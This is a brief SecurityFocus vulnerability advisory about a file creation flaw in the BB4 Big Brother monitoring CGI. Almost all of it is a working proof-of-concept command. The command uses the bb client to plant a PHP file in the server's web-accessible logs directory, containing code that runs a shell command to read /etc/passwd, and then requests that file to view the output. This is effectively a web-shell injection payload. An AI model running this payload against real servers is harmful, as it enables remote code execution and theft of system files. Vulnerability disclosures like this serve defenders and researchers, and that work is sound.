BB4 Big Brother CGI File Creation Vulnerability

./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"

will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.


 

Privacy Statement
Copyright 2010, SecurityFocus